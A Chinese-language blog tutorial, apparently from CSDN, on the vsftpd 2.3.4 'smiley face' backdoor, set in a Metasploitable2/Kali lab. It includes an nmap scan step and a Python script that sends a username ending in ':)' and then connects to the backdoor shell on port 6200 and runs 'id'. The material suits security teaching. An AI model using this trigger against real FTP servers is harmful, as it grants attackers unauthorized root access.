漏洞原理
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。 “vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。这个后门的存在可能导致攻击者执行恶意操作,例如未经授权地访问和修改FTP服务器上的文件。
————————————————
原文链接:https://blog.csdn.net/qq_52321992/article/details/131683176
1.安装好Metasploitable2靶机
2.打开kali root模式
红色选项即为root模式
3. 输入ifconfig查看Metasploitable2靶机的ip
4. 用kali输入 nmap -sV 靶机ip ,可以看到21端口版本是VSFTPD2.3.4
5. 启动Python脚本检测笑脸漏洞
import socket
import time
def connect_to_ftp(host, port):
try:
# 连接到FTP服务器
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ftp_socket.connect((host, port))
print(f"成功连接到FTP服务器 {host}:{port}")
# 接收FTP欢迎消息
response = ftp_socket.recv(1024).decode()
print(f"FTP服务器响应: {response}")
# 发送恶意用户名
ftp_socket.send(b'USER hacker:)\r\n')
time.sleep(1)
# 发送密码
ftp_socket.send(b'PASS anypassword\r\n')
time.sleep(1)
response = ftp_socket.recv(1024).decode()
print(f"FTP响应: {response}")
# 检查是否能够连接到后门shell
return check_backdoor_shell(host)
except Exception as e:
print(f"连接FTP服务器失败: {e}")
def check_backdoor_shell(host):
try:
# 连接到6200端口,后门shell可能开启
shell_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell_socket.connect((host, 6200))
print("后门shell已打开!连接到6200端口成功。")
# 向shell发送命令,获取root权限
shell_socket.send(b'id\n')
time.sleep(1)
response = shell_socket.recv(1024).decode()
print(f"从shell获得的响应: {response}")
shell_socket.close()
return True
except Exception as e:
print(f"连接6200端口失败: {e}")
return False
if __name__ == "__main__":
target_host = "192.168.81.130" # Metasploitable2的IP地址
target_port = 21 # FTP默认端口
connect_to_ftp(target_host, target_port)
可以看到,成功检测出了笑脸漏洞
标签:FTP,shell,socket,ftp,python,笑脸,漏洞,host,print From: https://blog.csdn.net/2301_79927453/article/details/143350411